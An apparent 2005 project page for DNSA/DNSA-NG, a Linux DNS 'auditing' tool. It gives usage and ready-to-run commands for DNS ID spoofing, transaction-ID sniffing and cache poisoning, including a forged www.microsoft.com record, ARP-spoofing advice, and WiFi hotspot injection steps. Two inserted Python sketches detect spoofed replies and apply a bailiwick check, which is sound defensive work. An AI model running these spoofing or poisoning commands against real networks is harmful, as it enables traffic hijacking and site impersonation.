DNSA (and DNSA-NG) - DNS Auditing tool


Pierre BETOUIN - pierre _dot_ betouin _at_ security-labs _dot_ org

Page last updated: Fri Jul 22 23:15 PDT 2005


DNSA and DNSA-NG are Swiss Army knife tools for Linux designed to test several DNS security issues.
You can download the current version of DNSA here. All bug reports and contributions are welcome. Don't hesitate to contact me. You can also download DNSA-NG 0.6, which works with libnet-ng and supports great new features. The most important one is full WiFi support using 2 cards:

Host-ap and madwifi drivers are already supported by DNSA-NG.

DNSA was initially conceived because of a lack of DNS auditing tools. It uses libnet and libpcap:

"Libnet is a high-level API (toolkit) allowing the application programmer to construct and inject network packets. It provides a portable and simplified interface for low-level network packet shaping, handling and injection. Libnet hides much of the tedium of packet creation from the application programmer such as multiplexing, buffer management, arcane packet header information, byte-ordering, OS-dependent issues, and much more. Libnet features portable packet creation interfaces at the IP layer and link layer, as well as a host of supplementary and complementary functionality. Using libnet, quick and simple packet assembly applications can be whipped up with little effort. With a bit more time, more complex programs can be written (Traceroute and ping were easily rewritten using libnet and libpcap)."

DNSA is distributed under the GPL licence.


Current Tree

Coming soon in stable 0.6 :

  • Man pages
  • DNS Server identification based on chaos version
  • DNS "collect servers" function

Current stable version : 0.5

Unstable DNSA-NG 0.6 :

  • New WiFi support (Prism and other chipsets)
  • Fixed some bugs

DNSA-NG 0.6
You'll have to compile it with Libnet-NG



DNSA Usage

Usage: ./dnsa [ARGS]
DNS Swiss knife tool

-1                        DNS ID spoofing [ Required : -S ]
   -D [www.domain.org]    Hostname query to fool. Don't use it if every DNS request sniffed has to be spoofed
   -S [IP]                IP address to send for dns queries
   -s [IP]                IP address of the host to fool
   -i [interface]         IP address to send for dns queries
-2                        DNS IDs Sniffing [ Required : -s ]
   -s [IP]                IP address of the server which makes queries
   -w [file]              Output file for DNS IDs
-3                        DNS cache poisoning [ Required : -S AND -b AND -a ]
   -a [host.domain.org]   Hostname to send in the additional record
   -b [IP]                IP to send in the additional record
   -D [www.domain.org]    Hostname for query. Use it if you want to fool just on
   -S [IP]                IP address to send for DNS queries (the normal one)
   -s [IP]                IP address of the server to fool
   -i [interface]         IP address to send for DNS queries
-h                        Print usage

DNSA-NG Usage

Usage: ./dnsa-ng [ARGS]
DNS Swiss knife tool

-m [mode]                 REQUIRED. Mode can be raw4 or link (depending on your network topology)
-t [media]                REQUIRED. Media can be 'wifi' or 'ether' ('wifi' needs 2 cards as described in the documentation, and needs the -I option to specify the injection card)
-1                        DNS ID spoofing [ Required : -S ]
   -D [www.domain.org]    Hostname query to fool. Don't use it if every DNS request sniffed has to be spoofed
   -S [IP]                IP address to send for dns queries
   -s [IP]                IP address of the host to fool
   -i [interface]         IP address to send for dns queries
-2                        DNS IDs Sniffing [ Required : -s ] (DEPRECATED IN THIS DNSA VERSION!)
   -s [IP]                IP address of the server which makes queries
   -w [file]              Output file for DNS IDs
-3                        DNS cache poisoning [ Required : -S AND -b AND -a ] (DEPRECATED IN THIS DNSA VERSION!)
   -a [host.domain.org]   Hostname to send in the additional record
   -b [IP]                IP to send in the additional record
   -D [www.domain.org]    Hostname for query. Use it if you want to fool just on
   -S [IP]                IP address to send for DNS queries (the normal one)
   -s [IP]                IP address of the server to fool
   -i [interface]         IP address to send for DNS queries
-h                        Print usage

DNSA Examples

DNS ID Spoofing

[ If you want to use it on switched networks, you'll need to use ARP spoofing. I recommend arp-sk, which is the best in my opinion! ;) ]

./dnsa -1 -D the_FQDN_you_want_to_reply_to.org -S IP_TO_SEND -s HOST_TO_FOOL -i INTERFACE
./dnsa -1 -D www.the_one.org -S 1.2.3.4 -s 192.168.0.1 -i eth0
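
In this mode the spoofed reply races the genuine one, so the fooled host normally receives two responses to a single query. The following detection sketch is an added example, not part of DNSA; the record layout, field names, the time window, and the 203.0.113.7 and example.net values are assumptions constructed for illustration.

```python
from collections import defaultdict

# Constructed sample of DNS responses seen by a sensor next to the client.
# Fields: (timestamp, client_ip, client_port, txid, qname, answer IPs)
SAMPLE_RESPONSES = [
    # Two replies to the same query that disagree: the spoofing signature.
    (10.001, "192.168.0.1", 33211, 0x1A2B, "www.the_one.org", ("1.2.3.4",)),
    (10.019, "192.168.0.1", 33211, 0x1A2B, "www.the_one.org", ("203.0.113.7",)),
    # Identical duplicate: a benign retransmission, must not alert.
    (11.500, "192.168.0.1", 33212, 0x1A2C, "example.net", ("198.51.100.9",)),
    (11.502, "192.168.0.1", 33212, 0x1A2C, "example.net", ("198.51.100.9",)),
]


def find_conflicting_responses(responses, window=2.0):
    """Return one alert per query that was answered twice with different data.

    A query is identified by (client IP, client port, transaction ID, name);
    a legitimate server answers it once, or repeats the same answer.
    """
    seen = defaultdict(list)
    for ts, ip, port, txid, qname, answers in sorted(responses):
        key = (ip, port, txid, qname.lower().rstrip("."))
        seen[key].append((ts, frozenset(answers)))

    alerts = []
    for (ip, port, txid, qname), hits in seen.items():
        first_ts, first_answers = hits[0]
        for ts, answers in hits[1:]:
            if ts - first_ts <= window and answers != first_answers:
                alerts.append({
                    "client": ip, "port": port, "txid": txid, "qname": qname,
                    "first": sorted(first_answers), "later": sorted(answers),
                    "gap": round(ts - first_ts, 3),
                })
    return alerts


if __name__ == "__main__":
    for alert in find_conflicting_responses(SAMPLE_RESPONSES):
        print("conflicting DNS answers:", alert)
```

The sensor cannot tell which of the two answers is genuine; the alert only says that the client was answered twice with different data and that the cached result should be treated as suspect.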

DNS Sniffing

[ For debugging and testing purposes ]

./dnsa -2 -s HOST_TO_SNIFF -w file_to_store_IDs
./dnsa -2 -s 192.168.0.1 -w IDs_of_192.168.0.1

DNS cache poisoning

./dnsa -3 -D the_host_IP_which_is_asked_for -S normal_host_IP -s DNS_server_which_is_doing_the_request -a host_in_additional_record -b ip_in_the_additional_record -i INTERFACE
./dnsa -3 -D hacker.pirate.org -S 100.101.102.103 -s 194.117.200.10 -a www.microsoft.com -b 1.2.3.4 -i eth0
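
The additional record in this test only sticks if the resolver caches data for names outside the zone it asked about. The bailiwick check below is an added example of the resolver-side mitigation, not part of DNSA; it assumes the resolver knows which zone the answering server was delegated for, and the function names and the ns1.pirate.org, notpirate.org and 192.0.2.53 values are constructed.

```python
def labels(name):
    """Split a DNS name into lower-cased labels, ignoring the trailing dot."""
    return [label for label in name.lower().rstrip(".").split(".") if label]


def in_bailiwick(owner, zone):
    """True if owner is the zone itself or a subdomain of it.

    The comparison is label by label: a plain string suffix test would
    wrongly accept notpirate.org as being inside pirate.org.
    """
    o, z = labels(owner), labels(zone)
    return len(o) >= len(z) and o[len(o) - len(z):] == z


def filter_additional(zone, additional):
    """Split additional records into (cacheable, discarded) for this zone."""
    kept, dropped = [], []
    for record in additional:
        owner = record[0]
        (kept if in_bailiwick(owner, zone) else dropped).append(record)
    return kept, dropped


# Constructed additional section of a response to a query for
# hacker.pirate.org, received from a server delegated for pirate.org.
ADDITIONAL = [
    ("ns1.pirate.org.", "A", "192.0.2.53"),   # inside the zone: cacheable
    ("www.microsoft.com.", "A", "1.2.3.4"),   # the record from the example above
    ("notpirate.org.", "A", "1.2.3.4"),       # look-alike suffix, different zone
]

if __name__ == "__main__":
    kept, dropped = filter_additional("pirate.org", ADDITIONAL)
    print("cache:  ", kept)
    print("discard:", dropped)
```

A resolver that applies this check caches nothing for www.microsoft.com from that response, so running mode -3 against it is a quick way to confirm the check is in place.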


DNSA-NG Examples

DNS ID Spoofing

./dnsa-ng -m raw4 -1 -D the_FQDN_you_want_to_reply_to.org -S IP_TO_SEND -s HOST_TO_FOOL -i CAPTURE_INTERFACE -t ether

./dnsa-ng -m raw4 -1 -D the_FQDN_you_want_to_reply_to.org -S IP_TO_SEND -s HOST_TO_FOOL -i CAPTURE_INTERFACE -t wifi -I INJECTION_INTERFACE
iwconfig ath0 mode monitor channel 11
iwconfig wlan0 mode managed channel 11 essid HOTSPOT
dhclient wlan0
./dnsa-ng -m raw4 -1 -D www.the_one.org -S 1.2.3.4 -s 192.168.0.1 -i ath0 -t wifi -I wlan0


Related links

Article on "DNS intrinsic security flows" - Pierre BETOUIN ( pierre _dot_ betouin _at_ security-labs _dot_ org )
